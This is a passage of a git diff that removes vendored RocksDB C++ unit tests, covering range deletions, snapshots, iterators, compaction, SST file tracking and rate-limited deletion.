-  // overflow the memtable.
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "blah", "val");
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromSst) {
-  db_->Put(WriteOptions(), "key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, GetCoveredMergeOperandFromMemtable) {
-  const int kNumMergeOps = 10;
-  Options opts = CurrentOptions();
-  opts.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  Reopen(opts);
-
-  for (int i = 0; i < kNumMergeOps; ++i) {
-    std::string val;
-    PutFixed64(&val, i);
-    db_->Merge(WriteOptions(), "key", val);
-    if (i == kNumMergeOps / 2) {
-      // deletes [0, 5]
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "key",
-                       "key_");
-    }
-  }
-
-  ReadOptions read_opts;
-  std::string expected, actual;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 30);  // 6+7+8+9
-  ASSERT_EQ(expected, actual);
-
-  expected.clear();
-  read_opts.ignore_range_deletions = true;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 45);  // 0+1+2+...+9
-  ASSERT_EQ(expected, actual);
-}
-
-TEST_F(DBRangeDelTest, GetIgnoresRangeDeletions) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 4;
-  opts.min_write_buffer_number_to_merge = 3;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "sst_key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  db_->Put(WriteOptions(), "imm_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "mem_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  for (std::string key : {"sst_key", "imm_key", "mem_key"}) {
-    std::string value;
-    ASSERT_OK(db_->Get(read_opts, key, &value));
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, IteratorRemovesCoveredKeys) {
-  const int kNum = 200, kRangeBegin = 50, kRangeEnd = 150, kNumPerFile = 25;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  Reopen(opts);
-
-  // Write half of the keys before the tombstone and half after the tombstone.
-  // Only covered keys (i.e., within the range and older than the tombstone)
-  // should be deleted.
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 2) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  ReadOptions read_opts;
-  auto* iter = db_->NewIterator(read_opts);
-
-  int expected = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    if (expected == kRangeBegin - 1) {
-      expected = kNum / 2;
-    } else {
-      ++expected;
-    }
-  }
-  ASSERT_EQ(kNum, expected);
-  delete iter;
-}
-
-TEST_F(DBRangeDelTest, IteratorOverUserSnapshot) {
-  const int kNum = 200, kRangeBegin = 50, kRangeEnd = 150, kNumPerFile = 25;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  Reopen(opts);
-
-  const Snapshot* snapshot = nullptr;
-  // Put a snapshot before the range tombstone, verify an iterator using that
-  // snapshot sees all inserted keys.
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 2) {
-      snapshot = db_->GetSnapshot();
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  ReadOptions read_opts;
-  read_opts.snapshot = snapshot;
-  auto* iter = db_->NewIterator(read_opts);
-
-  int expected = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    ++expected;
-  }
-  ASSERT_EQ(kNum / 2, expected);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, IteratorIgnoresRangeDeletions) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 4;
-  opts.min_write_buffer_number_to_merge = 3;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "sst_key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  db_->Put(WriteOptions(), "imm_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "mem_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  auto* iter = db_->NewIterator(read_opts);
-  int i = 0;
-  std::string expected[] = {"imm_key", "mem_key", "sst_key"};
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next(), ++i) {
-    std::string key;
-    ASSERT_EQ(expected[i], iter->key());
-  }
-  ASSERT_EQ(3, i);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-#ifndef ROCKSDB_UBSAN_RUN
-TEST_F(DBRangeDelTest, TailingIteratorRangeTombstoneUnsupported) {
-  db_->Put(WriteOptions(), "key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  // iterations check unsupported in memtable, l0, and then l1
-  for (int i = 0; i < 3; ++i) {
-    ReadOptions read_opts;
-    read_opts.tailing = true;
-    auto* iter = db_->NewIterator(read_opts);
-    if (i == 2) {
-      // For L1+, iterators over files are created on-demand, so need seek
-      iter->SeekToFirst();
-    }
-    ASSERT_TRUE(iter->status().IsNotSupported());
-    delete iter;
-    if (i == 0) {
-      ASSERT_OK(db_->Flush(FlushOptions()));
-    } else if (i == 1) {
-      MoveFilesToLevel(1);
-    }
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-#endif  // !ROCKSDB_UBSAN_RUN
-
-TEST_F(DBRangeDelTest, SubcompactionHasEmptyDedicatedRangeDelFile) {
-  const int kNumFiles = 2, kNumKeysPerFile = 4;
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.max_subcompactions = 2;
-  options.num_levels = 2;
-  options.target_file_size_base = 4096;
-  Reopen(options);
-
-  // need a L1 file for subcompaction to be triggered
-  ASSERT_OK(
-      db_->Put(WriteOptions(), db_->DefaultColumnFamily(), Key(0), "val"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  MoveFilesToLevel(1);
-
-  // put enough keys to fill up the first subcompaction, and later range-delete
-  // them so that the first subcompaction outputs no key-values. In that case
-  // it'll consider making an SST file dedicated to range deletions.
-  for (int i = 0; i < kNumKeysPerFile; ++i) {
-    ASSERT_OK(db_->Put(WriteOptions(), db_->DefaultColumnFamily(), Key(i),
-                       std::string(1024, 'a')));
-  }
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                             Key(kNumKeysPerFile)));
-
-  // the above range tombstone can be dropped, so that one alone won't cause a
-  // dedicated file to be opened. We can make one protected by snapshot that
-  // must be considered. Make its range outside the first subcompaction's range
-  // to exercise the tricky part of the code.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                             Key(kNumKeysPerFile + 1),
-                             Key(kNumKeysPerFile + 2)));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-
-  ASSERT_EQ(kNumFiles, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-
-  db_->EnableAutoCompaction({db_->DefaultColumnFamily()});
-  dbfull()->TEST_WaitForCompact();
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, MemtableBloomFilter) {
-  // regression test for #2743. the range delete tombstones in memtable should
-  // be added even when Get() skips searching due to its prefix bloom filter
-  const int kMemtableSize = 1 << 20;              // 1MB
-  const int kMemtablePrefixFilterSize = 1 << 13;  // 8KB
-  const int kNumKeys = 1000;
-  const int kPrefixLen = 8;
-  Options options = CurrentOptions();
-  options.memtable_prefix_bloom_size_ratio =
-      static_cast<double>(kMemtablePrefixFilterSize) / kMemtableSize;
-  options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(kPrefixLen));
-  options.write_buffer_size = kMemtableSize;
-  Reopen(options);
-
-  for (int i = 0; i < kNumKeys; ++i) {
-    ASSERT_OK(Put(Key(i), "val"));
-  }
-  Flush();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                             Key(kNumKeys)));
-  for (int i = 0; i < kNumKeys; ++i) {
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), Key(i), &value).IsNotFound());
-  }
-}
-
-TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) {
-  // make sure compaction treats files containing a split range deletion in the
-  // input level as an atomic unit. I.e., compacting any input-level file(s)
-  // containing a portion of the range deletion causes all other input-level
-  // files containing portions of that same range deletion to be included in the
-  // compaction.
-  const int kNumFilesPerLevel = 4, kValueBytes = 4 << 10;
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = kNumFilesPerLevel;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(2 /* num_entries_flush */));
-  options.target_file_size_base = kValueBytes;
-  // i == 0: CompactFiles
-  // i == 1: CompactRange
-  // i == 2: automatic compaction
-  for (int i = 0; i < 3; ++i) {
-    DestroyAndReopen(options);
-
-    ASSERT_OK(Put(Key(0), ""));
-    ASSERT_OK(db_->Flush(FlushOptions()));
-    MoveFilesToLevel(2);
-    ASSERT_EQ(1, NumTableFilesAtLevel(2));
-
-    // snapshot protects range tombstone from dropping due to becoming obsolete.
-    const Snapshot* snapshot = db_->GetSnapshot();
-    db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                     Key(2 * kNumFilesPerLevel));
-
-    Random rnd(301);
-    std::string value = RandomString(&rnd, kValueBytes);
-    for (int j = 0; j < kNumFilesPerLevel; ++j) {
-      // give files overlapping key-ranges to prevent trivial move
-      ASSERT_OK(Put(Key(j), value));
-      ASSERT_OK(Put(Key(2 * kNumFilesPerLevel - 1 - j), value));
-      if (j > 0) {
-        dbfull()->TEST_WaitForFlushMemTable();
-        ASSERT_EQ(j, NumTableFilesAtLevel(0));
-      }
-    }
-    // put extra key to trigger final flush
-    ASSERT_OK(Put("", ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(0, NumTableFilesAtLevel(0));
-    ASSERT_EQ(kNumFilesPerLevel, NumTableFilesAtLevel(1));
-
-    ColumnFamilyMetaData meta;
-    db_->GetColumnFamilyMetaData(&meta);
-    if (i == 0) {
-      ASSERT_OK(db_->CompactFiles(
-          CompactionOptions(), {meta.levels[1].files[0].name}, 2 /* level */));
-    } else if (i == 1) {
-      auto begin_str = Key(0), end_str = Key(1);
-      Slice begin = begin_str, end = end_str;
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &begin, &end));
-    } else if (i == 2) {
-      ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(),
-                                {{"max_bytes_for_level_base", "10000"}}));
-      dbfull()->TEST_WaitForCompact();
-    }
-    ASSERT_EQ(0, NumTableFilesAtLevel(1));
-    ASSERT_GT(NumTableFilesAtLevel(2), 0);
-
-    db_->ReleaseSnapshot(snapshot);
-  }
-}
-
-TEST_F(DBRangeDelTest, UnorderedTombstones) {
-  // Regression test for #2752. Range delete tombstones between
-  // different snapshot stripes are not stored in order, so the first
-  // tombstone of each snapshot stripe should be checked as a smallest
-  // candidate.
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-
-  auto cf = db_->DefaultColumnFamily();
-
-  ASSERT_OK(db_->Put(WriteOptions(), cf, "a", "a"));
-  ASSERT_OK(db_->Flush(FlushOptions(), cf));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "b", "c"));
-  // Hold a snapshot to separate these two delete ranges.
-  auto snapshot = db_->GetSnapshot();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "a", "b"));
-  ASSERT_OK(db_->Flush(FlushOptions(), cf));
-  db_->ReleaseSnapshot(snapshot);
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(cf, &files);
-  ASSERT_EQ(1, files[0].size());
-  ASSERT_EQ("a", files[0][0].smallest.user_key());
-  ASSERT_EQ("c", files[0][0].largest.user_key());
-
-  std::string v;
-  auto s = db_->Get(ReadOptions(), "a", &v);
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_sst_test.cc b/thirdparty/rocksdb/db/db_sst_test.cc
deleted file mode 100644
index e01754c..0000000
--- a/thirdparty/rocksdb/db/db_sst_test.cc
+++ /dev/null
@@ -1,849 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_manager.h"
-#include "util/sst_file_manager_impl.h"
-
-namespace rocksdb {
-
-class DBSSTTest : public DBTestBase {
- public:
-  DBSSTTest() : DBTestBase("/db_sst_test") {}
-};
-
-TEST_F(DBSSTTest, DontDeletePendingOutputs) {
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Every time we write to a table file, call FOF/POF with full DB scan. This
-  // will make sure our pending_outputs_ protection work correctly
-  std::function<void()> purge_obsolete_files_function = [&]() {
-    JobContext job_context(0);
-    dbfull()->TEST_LockMutex();
-    dbfull()->FindObsoleteFiles(&job_context, true /*force*/);
-    dbfull()->TEST_UnlockMutex();
-    dbfull()->PurgeObsoleteFiles(job_context);
-    job_context.Clean();
-  };
-
-  env_->table_write_callback_ = &purge_obsolete_files_function;
-
-  for (int i = 0; i < 2; ++i) {
-    ASSERT_OK(Put("a", "begin"));
-    ASSERT_OK(Put("z", "end"));
-    ASSERT_OK(Flush());
-  }
-
-  // If pending output guard does not work correctly, PurgeObsoleteFiles() will
-  // delete the file that Compaction is trying to create, causing this: error
-  // db/db_test.cc:975: IO error:
-  // /tmp/rocksdbtest-1552237650/db_test/000009.sst: No such file or directory
-  Compact("a", "b");
-}
-
-// 1 Create some SST files by inserting K-V pairs into DB
-// 2 Close DB and change suffix from ".sst" to ".ldb" for every other SST file
-// 3 Open DB and check if all key can be read
-TEST_F(DBSSTTest, SSTsWithLdbSuffixHandling) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_id = 0;
-  for (int i = 0; i < 10; ++i) {
-    GenerateNewFile(&rnd, &key_id, false);
-  }
-  Flush();
-  Close();
-  int const num_files = GetSstFileCount(dbname_);
-  ASSERT_GT(num_files, 0);
-
-  std::vector<std::string> filenames;
-  GetSstFiles(dbname_, &filenames);
-  int num_ldb_files = 0;
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    if (i & 1) {
-      continue;
-    }
-    std::string const rdb_name = dbname_ + "/" + filenames[i];
-    std::string const ldb_name = Rocks2LevelTableFileName(rdb_name);
-    ASSERT_TRUE(env_->RenameFile(rdb_name, ldb_name).ok());
-    ++num_ldb_files;
-  }
-  ASSERT_GT(num_ldb_files, 0);
-  ASSERT_EQ(num_files, GetSstFileCount(dbname_));
-
-  Reopen(options);
-  for (int k = 0; k < key_id; ++k) {
-    ASSERT_NE("NOT_FOUND", Get(Key(k)));
-  }
-  Destroy(options);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBSSTTest, DontDeleteMovedFile) {
-  // This test triggers move compaction and verifies that the file is not
-  // deleted when it's part of move compaction
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-  options.level0_file_num_compaction_trigger =
-      2;  // trigger compaction when we have 2 files
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  // Create two 1MB sst files
-  for (int i = 0; i < 2; ++i) {
-    // Create 1MB sst file
-    for (int j = 0; j < 100; ++j) {
-      ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-    }
-    ASSERT_OK(Flush());
-  }
-  // this should execute both L0->L1 and L1->(move)->L2 compactions
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-  // If the moved file is actually deleted (the move-safeguard in
-  // ~Version::Version() is not there), we get this failure:
-  // Corruption: Can't access /000009.sst
-  Reopen(options);
-}
-
-// This reproduces a bug where we don't delete a file because when it was
-// supposed to be deleted, it was blocked by pending_outputs
-// Consider:
-// 1. current file_number is 13
-// 2. compaction (1) starts, blocks deletion of all files starting with 13
-// (pending outputs)
-// 3. file 13 is created by compaction (2)
-// 4. file 13 is consumed by compaction (3) and file 15 was created. Since file
-// 13 has no references, it is put into VersionSet::obsolete_files_
-// 5. FindObsoleteFiles() gets file 13 from VersionSet::obsolete_files_. File 13
-// is deleted from obsolete_files_ set.
-// 6. PurgeObsoleteFiles() tries to delete file 13, but this file is blocked by
-// pending outputs since compaction (1) is still running. It is not deleted and
-// it is not present in obsolete_files_ anymore. Therefore, we never delete it.
-TEST_F(DBSSTTest, DeleteObsoleteFilesPendingOutputs) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 2 * 1024 * 1024;     // 2 MB
-  options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-  options.level0_file_num_compaction_trigger =
-      2;  // trigger compaction when we have 2 files
-  options.max_background_flushes = 2;
-  options.max_background_compactions = 2;
-
-  OnFileDeletionListener* listener = new OnFileDeletionListener();
-  options.listeners.emplace_back(listener);
-
-  Reopen(options);
-
-  Random rnd(301);
-  // Create two 1MB sst files
-  for (int i = 0; i < 2; ++i) {
-    // Create 1MB sst file
-    for (int j = 0; j < 100; ++j) {
-      ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-    }
-    ASSERT_OK(Flush());
-  }
-  // this should execute both L0->L1 and L1->(move)->L2 compactions
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-  test::SleepingBackgroundTask blocking_thread;
-  port::Mutex mutex_;
-  bool already_blocked(false);
-
-  // block the flush
-  std::function<void()> block_first_time = [&]() {
-    bool blocking = false;
-    {
-      MutexLock l(&mutex_);
-      if (!already_blocked) {
-        blocking = true;
-        already_blocked = true;
-      }
-    }
-    if (blocking) {
-      blocking_thread.DoSleep();
-    }
-  };
-  env_->table_write_callback_ = &block_first_time;
-  // Insert 2.5MB data, which should trigger a flush because we exceed
-  // write_buffer_size. The flush will be blocked with block_first_time
-  // pending_file is protecting all the files created after
-  for (int j = 0; j < 256; ++j) {
-    ASSERT_OK(Put(Key(j), RandomString(&rnd, 10 * 1024)));
-  }
-  blocking_thread.WaitUntilSleeping();
-
-  ASSERT_OK(dbfull()->TEST_CompactRange(2, nullptr, nullptr));
-
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  auto file_on_L2 = metadata[0].name;
-  listener->SetExpectedFileName(dbname_ + file_on_L2);
-
-  ASSERT_OK(dbfull()->TEST_CompactRange(3, nullptr, nullptr, nullptr,
-                                        true /* disallow trivial move */));
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel(0));
-
-  // finish the flush!
-  blocking_thread.WakeUp();
-  blocking_thread.WaitUntilDone();
-  dbfull()->TEST_WaitForFlushMemTable();
-  // File just flushed is too big for L0 and L1 so gets moved to L2.
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1,0,1", FilesPerLevel(0));
-
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 2U);
-
-  // This file should have been deleted during last compaction
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(dbname_ + file_on_L2));
-  listener->VerifyMatchedCount(1);
-}
-
-TEST_F(DBSSTTest, DBWithSstFileManager) {
-  std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-  auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  int files_added = 0;
-  int files_deleted = 0;
-  int files_moved = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.sst_file_manager = sst_file_manager;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 25; i++) {
-    GenerateNewRandomFile(&rnd);
-    ASSERT_OK(Flush());
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    // Verify that we are tracking all sst files in dbname_
-    ASSERT_EQ(sfm->GetTrackedFiles(), GetAllSSTFiles());
-  }
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  auto files_in_db = GetAllSSTFiles();
-  // Verify that we are tracking all sst files in dbname_
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  // Verify the total files size
-  uint64_t total_files_size = 0;
-  for (auto& file_to_size : files_in_db) {
-    total_files_size += file_to_size.second;
-  }
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-  // We flushed at least 25 files
-  ASSERT_GE(files_added, 25);
-  // Compaction must have deleted some files
-  ASSERT_GT(files_deleted, 0);
-  // No files were moved
-  ASSERT_EQ(files_moved, 0);
-
-  Close();
-  Reopen(options);
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-
-  // Verify that we track all the files again after the DB is closed and opened
-  Close();
-  sst_file_manager.reset(NewSstFileManager(env_));
-  options.sst_file_manager = sst_file_manager;
-  sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  Reopen(options);
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBSSTTest, RateLimitedDelete) {
-  Destroy(last_options_);
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBSSTTest::RateLimitedDelete:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "InstrumentedCondVar::TimedWaitInternal", [&](void* arg) {
-        // Turn timed wait into a simulated sleep
-        uint64_t* abs_time_us = static_cast<uint64_t*>(arg);
-        int64_t cur_time = 0;
-        env_->GetCurrentTime(&cur_time);
-        if (*abs_time_us > static_cast<uint64_t>(cur_time)) {
-          env_->addon_time_.fetch_add(*abs_time_us -
-                                      static_cast<uint64_t>(cur_time));
-        }
-
-        // Randomly sleep shortly
-        env_->addon_time_.fetch_add(
-            static_cast<uint64_t>(Random::GetTLSInstance()->Uniform(10)));
-
-        // Set wait until time to before current to force not to sleep.
-        int64_t real_cur_time = 0;
-        Env::Default()->GetCurrentTime(&real_cur_time);
-        *abs_time_us = static_cast<uint64_t>(real_cur_time);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->no_slowdown_ = true;
-  env_->time_elapse_only_sleep_ = true;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.env = env_;
-
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  int64_t rate_bytes_per_sec = 1024 * 10;  // 10 Kbs / Sec
-  Status s;
-  options.sst_file_manager.reset(
-      NewSstFileManager(env_, nullptr, trash_dir, 0, false, &s));
-  ASSERT_OK(s);
-  options.sst_file_manager->SetDeleteRateBytesPerSecond(rate_bytes_per_sec);
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-
-  ASSERT_OK(TryReopen(options));
-  // Create 4 files in L0
-  for (char v = 'a'; v <= 'd'; v++) {
-    ASSERT_OK(Put("Key2", DummyString(1024, v)));
-    ASSERT_OK(Put("Key3", DummyString(1024, v)));
-    ASSERT_OK(Put("Key4", DummyString(1024, v)));
-    ASSERT_OK(Put("Key1", DummyString(1024, v)));
-    ASSERT_OK(Put("Key4", DummyString(1024, v)));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  // Compaction will move the 4 files in L0 to trash and create 1 L1 file
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  uint64_t delete_start_time = env_->NowMicros();
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DBSSTTest::RateLimitedDelete:1");
-  sfm->WaitForEmptyTrash();
-  uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-  uint64_t total_files_size = 0;
-  uint64_t expected_penlty = 0;
-  ASSERT_EQ(penalties.size(), metadata.size());
-  for (size_t i = 0; i < metadata.size(); i++) {
-    total_files_size += metadata[i].size;
-    expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec);
-    ASSERT_EQ(expected_penlty, penalties[i]);
-  }
-  ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-  ASSERT_LT(time_spent_deleting, expected_penlty * 1.1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// Create a DB with 2 db_paths, and generate multiple files in the 2
-// db_paths using CompactRangeOptions, make sure that files that were
-// deleted from first db_path were deleted using DeleteScheduler and
-// files in the second path were not.
-TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
